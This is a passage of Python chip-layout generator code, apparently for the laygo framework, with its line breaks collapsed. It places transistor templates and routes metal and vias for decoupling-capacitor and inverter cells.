direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') # route #pdict = [laygen.get_inst_pin_xy(None, None, rg_m1m2, index=np.array([i, 0])) for i in range(m)] xy_g0 = laygen.get_template_pin_xy(in1.cellname, 'G0', rg_m1m2)[0, :] xy_d0 = laygen.get_template_pin_xy(in1.cellname, 'D0', rg_m1m2)[0, :] xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] #gate route laygen.route(None, laygen.layers['metal'][2], xy0=xy_g0, xy1=xy_g0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=xy_g0, xy1=xy_g0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_g0, refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, xy_g0, refinstname=ip1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) #source route for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=ip1.name, refinstindex1=np.array([i, 0])) #drain route if m > 1: laygen.route(None, laygen.layers['metal'][2], xy0=xy_d0+np.array([0, 1]), xy1=xy_d0+np.array([0, 1]), gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_d0+np.array([0, 1]), refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=xy_d0+np.array([0, 1]), xy1=xy_d0+np.array([0, 1]), gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_d0+np.array([0, 1]), refinstname=ip1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) # vss/vdd vertical route laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0]), xy1=xy_g0, gridname0=rg_m2m3, refinstname0=ip1.name, refinstname1=in1.name, refinstindex0=np.array([0, 0]), refinstindex1=np.array([0, 0]), via0=[[0, 0]], via1=[[0, 0]]) laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0]), xy1=xy_g0, gridname0=rg_m2m3, refinstname0=in1.name, refinstname1=ip1.name, refinstindex0=np.array([m-1, 0]), refinstindex1=np.array([m-1, 0]), via0=[[0, 0]], via1=[[0, 0]]) laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0])+np.array([0, 2]), xy1=xy_g0*np.array([1, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refinstname1=in1.name, refinstindex0=np.array([m-1, 0]), refinstindex1=np.array([m-1, 0]), via0=[[0, 0]], via1=[[0, 0]]) laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0])+np.array([0, 2]), xy1=xy_g0*np.array([1, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refinstname1=ip1.name, refinstindex0=np.array([0, 0]), refinstindex1=np.array([0, 0]), via0=[[0, 0]], via1=[[0, 0]]) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # pin if create_pin == True: create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_dcap3(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_space, m=2, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 m = max(1, int(m / 2)) # using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_space, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1])) ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_space, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip1b = laygen.relplace(name = "I"+objectname_pfix+'P1B', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') # route #pdict = [laygen.get_inst_pin_xy(None, None, rg_m1m2, index=np.array([i, 0])) for i in range(m)] xy_g0 = laygen.get_template_pin_xy(in1.cellname, 'G0', rg_m1m2)[0, :] xy_d0 = laygen.get_template_pin_xy(in1.cellname, 'D0', rg_m1m2)[0, :] xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] #vss ''' for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) ''' ''' laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([0, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([m-1, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) ''' laygen.route(None, laygen.layers['metal'][2], xy0=xy_d0, xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) for i in range(m-1): laygen.via(None, xy_d0, refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, xy_s1, refinstname=in1.name, refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=xy_s0+np.array([0, 1]), xy1=xy_d0+np.array([0, 1]), gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) laygen.via(None, xy_d0+np.array([0, 1]), refinstname=in1.name, refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, xy_s0+np.array([0, 1]), refinstname=in1.name, refinstindex=np.array([0, 0]), gridname=rg_m1m2) #gate laygen.route(None, laygen.layers['metal'][2], xy0=xy_g0, xy1=xy_g0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_g0, refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][1], xy0=xy_g0, xy1=xy_g0+np.array([0, 2]), gridname0=rg_m1m2, refinstname0=in1.name, refinstname1=in1.name, via1=[[0, 0]]) laygen.route(None, laygen.layers['metal'][2], xy0=xy_g0+np.array([0, 2]), xy1=xy_g0+np.array([3, 2]), gridname0=rg_m1m2, refinstname0=in1.name, refinstname1=in1.name, via1=[[0, 0]]) laygen.route(None, laygen.layers['metal'][1], xy0=xy_g0*np.array([1, 0])+np.array([3, 0]), xy1=xy_g0+np.array([3, 2]), gridname0=rg_m1m2, refinstname0=ip1.name, via0=[[0, 0]], refinstname1=in1.name) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # pin if create_pin == True: create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_bcap2(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body, m=2, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 m = max(1, int(m / 2)) # using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') # route #pdict = [laygen.get_inst_pin_xy(None, None, rg_m1m2, index=np.array([i, 0])) for i in range(m)] xy_g0 = laygen.get_template_pin_xy(in1.cellname, 'G0', rg_m1m2)[0, :] xy_d0 = laygen.get_template_pin_xy(in1.cellname, 'D0', rg_m1m2)[0, :] xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] #gate route laygen.route(None, laygen.layers['metal'][2], xy0=xy_g0, xy1=xy_g0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=xy_g0, xy1=xy_g0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_g0, refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, xy_g0, refinstname=ip1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) #source route for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=ip1.name, refinstindex1=np.array([i, 0])) #drain route if m > 1: laygen.route(None, laygen.layers['metal'][2], xy0=xy_d0+np.array([0, 1]), xy1=xy_d0+np.array([0, 1]), gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_d0+np.array([0, 1]), refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=xy_d0+np.array([0, 1]), xy1=xy_d0+np.array([0, 1]), gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_d0+np.array([0, 1]), refinstname=ip1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) #input route rg0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2, 0]), xy1=np.array([2, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0', via0=[[0, 0]], via1=[[0, 0]]) # vss/vdd vertical route #laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0]), xy1=xy_g0, gridname0=rg_m2m3, # refinstname0=ip1.name, refinstname1=in1.name, # refinstindex0=np.array([0, 0]), refinstindex1=np.array([0, 0]), via0=[[0, 0]], via1=[[0, 0]]) #laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0]), xy1=xy_g0, gridname0=rg_m2m3, # refinstname0=in1.name, refinstname1=ip1.name, # refinstindex0=np.array([m-1, 0]), refinstindex1=np.array([m-1, 0]), via0=[[0, 0]], via1=[[0, 0]]) laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0])+np.array([0, 2]), xy1=xy_g0*np.array([1, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refinstname1=in1.name, refinstindex0=np.array([m-1, 0]), refinstindex1=np.array([m-1, 0]), via0=[[0, 0]], via1=[[0, 0]]) laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0])+np.array([0, 2]), xy1=xy_g0*np.array([1, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refinstname1=ip1.name, refinstindex0=np.array([0, 0]), refinstindex1=np.array([0, 0]), via0=[[0, 0]], via1=[[0, 0]]) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I'], rect_list=[rg0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_inv(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body, m=1, pin_i_abut='nmos', origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m = max(1, int(m / 2)) # using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') # route # horizontal route style # input if pin_i_abut=="nmos": refinstname_in=in1.name else: refinstname_in=ip1.name for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) laygen.via(None, np.array([0, 0]), refinstname=refinstname_in, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=refinstname_in, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=refinstname_in, refpinname1='G0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") ri0 = laygen.route("R"+objectname_pfix+"I0", laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0') laygen.via(None, np.array([-1, 0]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=refinstname_in, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=refinstname_in, refpinname1='G0', refinstindex1=np.array([m-1, 0])) ri0 = laygen.route("R"+objectname_pfix+"I0", laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m2m3) # output if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([m-1, 0]), refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2,refinstindex=np.array([i, 0])) xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([m-1, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([m-1, 0]), refinstname1=ip1.name, refinstindex1=np.array([m-1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0])) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I', 'O'], rect_list=[ri0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_inv_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_nmos_space, devname_pmos_boundary, devname_pmos_body, devname_pmos_space, pin_i_abut='nmos', pin_o_y=0, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name) in2 = laygen.relplace(name = "I"+objectname_pfix + 'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_space, gridname = pg, refinstname = in2.name) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX') ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_space, gridname = pg, refinstname = ip2.name, transform='MX') # route # input if pin_i_abut == "nmos": refinstname_in = in1.name else: refinstname_in = ip1.name laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0') ri0 = laygen.route("R"+objectname_pfix+"I0", laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m2m3) # output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, pin_o_y]), xy1=np.array([1, pin_o_y]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in1.name, refpinname1='D0', endstyle0='extend', endstyle1='extend') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, pin_o_y]), xy1=np.array([1, pin_o_y]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip1.name, refpinname1='D0', endstyle0 = 'extend', endstyle1 = 'extend') ro0 = laygen.route("R" + objectname_pfix +"O0", laygen.layers['metal'][3], xy0=np.array([0, pin_o_y]), xy1=np.array([0, pin_o_y]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=ip1.name, refpinname1='D0') laygen.via(None, np.array([0, pin_o_y]), refinstname=in1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, pin_o_y]), refinstname=ip1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, pin_o_y]), refinstname=in1.name, refpinname='D0', gridname=rg_m2m3) laygen.via(None, np.array([0, pin_o_y]), refinstname=ip1.name, refpinname='D0', gridname=rg_m2m3) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip3.name) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in3.name) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstname1=in1.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstname1=ip1.name) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * 